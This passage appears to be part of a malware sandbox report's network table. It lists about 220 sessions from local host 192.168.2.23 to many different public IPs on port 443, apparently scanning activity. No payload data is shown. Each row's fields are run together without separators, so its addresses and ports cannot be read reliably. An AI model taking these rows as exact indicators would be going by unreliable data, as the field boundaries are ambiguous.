                                          17529192.168.2.2349758161.100.243.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17530192.168.2.2352920131.246.25.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17531192.168.2.2342394193.14.41.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17532192.168.2.233295641.235.220.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17533192.168.2.2338560137.146.31.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17534192.168.2.2353498150.155.69.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17535192.168.2.2345618162.178.162.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17536192.168.2.2340952121.105.6.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17537192.168.2.2340582113.89.75.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17538192.168.2.2338740126.93.89.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17539192.168.2.234824294.117.61.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17540192.168.2.233648268.176.53.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17541192.168.2.2339766181.60.169.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17542192.168.2.2346072195.23.163.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17543192.168.2.235075680.75.165.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17544192.168.2.2333206145.98.18.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17545192.168.2.2354328105.138.56.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17546192.168.2.2346014131.253.253.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17547192.168.2.2351342182.75.1.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17548192.168.2.2345486163.149.151.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17549192.168.2.235770679.136.92.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17550192.168.2.233347660.239.214.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17551192.168.2.235676687.68.48.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17552192.168.2.2344070121.205.130.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17553192.168.2.234172886.119.136.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17554192.168.2.2342940114.72.216.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17555192.168.2.2355832171.244.138.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17556192.168.2.2349424173.119.151.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17557192.168.2.2352684113.237.34.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17558192.168.2.2340290151.238.10.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17559192.168.2.235946866.18.128.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17560192.168.2.2336740183.58.122.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17561192.168.2.2347506105.20.13.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17562192.168.2.2358372209.241.105.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17563192.168.2.2359732152.212.177.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17564192.168.2.2333348188.227.224.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17565192.168.2.23597685.206.166.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17566192.168.2.234181876.4.70.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17567192.168.2.235969018.238.6.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17568192.168.2.235381013.22.57.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17569192.168.2.2350100198.64.174.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17570192.168.2.2341652125.59.121.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17571192.168.2.233797077.184.173.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17572192.168.2.2349000210.163.249.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17573192.168.2.2346248197.189.12.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17574192.168.2.2360252210.143.130.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17575192.168.2.2346116216.38.146.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17576192.168.2.235977239.147.174.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17577192.168.2.2346708178.99.122.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17578192.168.2.2349360212.231.168.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17579192.168.2.23564829.154.203.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17580192.168.2.234760873.184.47.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17581192.168.2.235184258.119.78.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17582192.168.2.233944275.114.20.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17583192.168.2.2352374217.129.40.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17584192.168.2.235867031.237.93.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17585192.168.2.23562824.133.16.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17586192.168.2.2333378220.244.92.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17587192.168.2.2352528123.253.151.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17588192.168.2.2352132180.239.77.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17589192.168.2.235063466.52.176.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17590192.168.2.233925066.148.110.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17591192.168.2.2336934144.59.94.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17592192.168.2.2360462151.68.53.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17593192.168.2.234363887.125.17.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17594192.168.2.234349837.186.242.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17595192.168.2.233626485.52.47.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17596192.168.2.236023896.60.69.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17597192.168.2.2339038158.191.190.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17598192.168.2.234584447.207.103.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17599192.168.2.2347272184.211.153.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17600192.168.2.234477240.14.253.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17601192.168.2.2356476105.27.6.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17602192.168.2.234112263.130.61.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17603192.168.2.2356522154.106.235.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17604192.168.2.2345554203.129.98.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17605192.168.2.233732236.35.187.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17606192.168.2.235658085.87.29.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17607192.168.2.234218219.220.255.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17608192.168.2.2342322172.44.6.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17609192.168.2.2359254180.131.72.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17610192.168.2.235491285.218.98.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17611192.168.2.2349364220.181.75.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17612192.168.2.2357500175.42.224.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17613192.168.2.2360022217.83.186.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17614192.168.2.234860014.57.189.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17615192.168.2.234545413.231.219.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17616192.168.2.2348104144.135.88.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17617192.168.2.2354746189.148.181.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17618192.168.2.2343534123.217.144.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17619192.168.2.2334996179.40.8.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17620192.168.2.2343762150.205.41.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17621192.168.2.233670817.238.237.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17622192.168.2.23566101.0.17.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17623192.168.2.234537691.137.34.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17624192.168.2.234790098.124.250.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17625192.168.2.2339282136.176.13.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17626192.168.2.233635070.121.30.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17627192.168.2.2335222199.11.176.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17628192.168.2.2353596173.205.31.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17629192.168.2.234647046.185.238.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17630192.168.2.2338544210.39.85.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17631192.168.2.2340250131.207.168.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17632192.168.2.235406018.6.209.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17633192.168.2.233342091.21.42.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17634192.168.2.234357498.92.168.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17635192.168.2.2338398179.26.170.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17636192.168.2.234778069.18.162.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17637192.168.2.2342168177.123.30.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17638192.168.2.234974461.71.65.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17639192.168.2.2349190128.46.204.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17640192.168.2.234198214.223.157.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17641192.168.2.233857232.204.237.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17642192.168.2.235276460.152.77.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17643192.168.2.235475495.151.165.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17644192.168.2.2335904171.84.82.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17645192.168.2.2354186123.168.173.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17646192.168.2.23563189.153.112.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17647192.168.2.2347188162.10.27.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17648192.168.2.2341294107.81.136.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17649192.168.2.2334476107.169.158.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17650192.168.2.2357992181.109.18.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17651192.168.2.2335368187.240.91.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17652192.168.2.2333814141.222.152.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17653192.168.2.2341298195.195.16.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17654192.168.2.2355264180.193.3.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17655192.168.2.2359414207.47.80.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17656192.168.2.23600961.195.133.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17657192.168.2.235955272.134.4.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17658192.168.2.2348514175.224.192.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17659192.168.2.23337482.60.227.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17660192.168.2.2353244191.141.116.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17661192.168.2.2360814178.100.211.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17662192.168.2.2353452107.85.165.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17663192.168.2.234431886.55.117.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17664192.168.2.234169499.77.94.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17665192.168.2.2345380171.134.140.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17666192.168.2.2336154101.141.36.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17667192.168.2.233896254.46.123.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17668192.168.2.235575454.106.83.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17669192.168.2.2336336211.27.171.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17670192.168.2.235795074.147.20.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17671192.168.2.2349726190.106.220.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17672192.168.2.2336378213.217.126.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17673192.168.2.234569859.127.176.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17674192.168.2.2338844188.80.131.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17675192.168.2.235100859.101.111.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17676192.168.2.2342952111.32.142.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17677192.168.2.235742254.53.76.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17678192.168.2.2333738121.247.213.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17679192.168.2.234510671.131.5.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17680192.168.2.2348900146.157.34.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17681192.168.2.2350998162.57.177.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17682192.168.2.2351828165.225.48.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17683192.168.2.2335988153.55.209.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17684192.168.2.234170267.165.229.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17685192.168.2.2334322146.91.209.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17686192.168.2.234797631.191.198.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17687192.168.2.233392439.236.159.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17688192.168.2.2344566101.189.46.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17689192.168.2.233860854.74.27.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17690192.168.2.233845480.35.192.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17691192.168.2.2343502129.80.245.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17692192.168.2.2348486200.7.229.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17693192.168.2.2335934195.47.127.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17694192.168.2.234819092.124.25.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17695192.168.2.235423018.4.223.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17696192.168.2.235225244.143.198.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17697192.168.2.2348542132.135.79.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17698192.168.2.2335578207.59.154.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17699192.168.2.235219899.170.171.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17700192.168.2.2336724157.61.243.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17701192.168.2.235774078.252.40.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17702192.168.2.2351430176.156.240.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17703192.168.2.2357152149.4.247.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17704192.168.2.234844836.88.245.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17705192.168.2.2340620211.132.2.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17706192.168.2.233768438.126.121.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17707192.168.2.234016450.252.252.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17708192.168.2.234462096.160.154.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17709192.168.2.235245448.49.232.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17710192.168.2.233433643.73.154.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17711192.168.2.234299296.79.23.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17712192.168.2.235944477.186.7.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17713192.168.2.2356820109.191.55.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17714192.168.2.233943071.176.120.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17715192.168.2.2347264221.219.12.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17716192.168.2.2352932167.250.137.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17717192.168.2.233468436.178.221.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17718192.168.2.234559875.236.61.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17719192.168.2.2338728195.170.234.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17720192.168.2.235940236.201.218.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17721192.168.2.2357816117.97.220.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17722192.168.2.2349762137.21.186.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17723192.168.2.235903870.226.245.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17724192.168.2.234305488.184.195.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17725192.168.2.234802075.22.112.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17726192.168.2.2345884200.36.158.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17727192.168.2.2333454199.77.89.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17728192.168.2.2347428156.178.27.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17729192.168.2.2340658153.11.89.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17730192.168.2.2333898176.244.167.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17731192.168.2.234734849.155.74.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17732192.168.2.2344724153.205.235.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17733192.168.2.2342010210.0.147.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17734192.168.2.2354940137.243.173.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17735192.168.2.2332848138.197.190.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17736192.168.2.235896620.59.179.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17737192.168.2.2340352170.105.21.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17738192.168.2.235307034.145.6.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17739192.168.2.235003073.94.155.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17740192.168.2.233935836.226.197.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17741192.168.2.2338596149.151.146.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17742192.168.2.2347224132.97.192.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17743192.168.2.2356884114.171.53.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17744192.168.2.2333644182.98.206.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17745192.168.2.2347798100.149.91.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17746192.168.2.2337786145.8.231.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17747192.168.2.2359706140.138.87.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17748192.168.2.2359890157.232.5.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17749192.168.2.2358824164.82.193.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17750192.168.2.234358652.106.76.192443
                                          TimestampBytes transferredDirectionData


